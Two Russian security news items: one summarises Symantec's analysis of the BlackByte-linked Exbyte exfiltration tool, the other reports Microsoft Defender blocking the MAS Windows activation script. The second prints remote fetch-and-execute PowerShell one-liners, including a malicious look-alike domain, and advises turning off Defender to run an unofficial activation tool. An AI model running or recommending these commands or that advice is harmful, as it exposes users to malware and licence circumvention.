Шифровальщик BlackByte тоже научился воровать документы из сети

Шифровальщик BlackByte тоже научился воровать документы из сети

Шифровальщик BlackByte тоже научился воровать документы из сети

Авторы атак с участием BlackByte начали использовать новый кастомный инструмент — Exbyte. В Symantec изучили новинку и выяснили, что она позволяет выгружать данные из Windows-систем на удаленный сервер и столь же умело уклоняется от анализа, как и сам шифровальщик.

Операторы вымогательских программ обычно прибегают к эксфильтрации данных в рамках схем двойного шантажа — чтобы угрожать публикацией в случае неуплаты выкупа за дешифратор. Кибергруппа, стоящая за BlackByte, создала с этой целью сайт еще в прошлом году, однако кражи информации из сетей, зараженных зловредом, на тот момент замечено не было.

Теперь, согласно Symantec, у злоумышленников появился необходимый инструмент; его использует как минимум один аффилиат RaaS-сервиса на основе BlackByte. Анализ показал, что Exbyte написан на Go и выводит краденые файлы в облачное хранилище MEGA.

При запуске вредонос выполняет ряд проверок, чтобы предотвратить анализ кода: вызывает функции IsDebuggerPresent и CheckRemoteDebuggerPresent, ищет процессы и DLL-файлы, ассоциируемые с песочницами и антивирусами. Такие же тесты, по словам экспертов, проводит BlackByte, но уже после вывода данных.

Если среда исполнения оказывается приемлемой, Exbyte перечисляет все документы в системе (.txt, .doc, .pdf и т. п.) и сохраняет список в %APPDATA%\dummy. Сами файлы зловред выгружает на Mega.co.nz, создавая папку и используя вшитые в код учетные данные.

В недавних атаках BlackByte, попавших в поле зрения Symantec, хакеры использовали уязвимости ProxyShell и ProxyLogon, а для горизонтального перемещения по сети — AdFind, AnyDesk, NetScan и PowerView. Внедряемый шифровальщик версии 2.0 пытался отключить драйверы режима ядра, используемые EDR, удалить теневые копии Windows, открыть удаленный доступ через настройки брандмауэра и выполнить основную задачу, работая в памяти scvhost.exe.

Аналитики не преминули отметить, что Exbyte — не единственный кастомный инструмент вывода данных. В прошлом году были обнаружены Exmatter, привлекший внимание BlackCat, и StealBit; аналогичный инфостилер некогда использовал также Ryuk.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru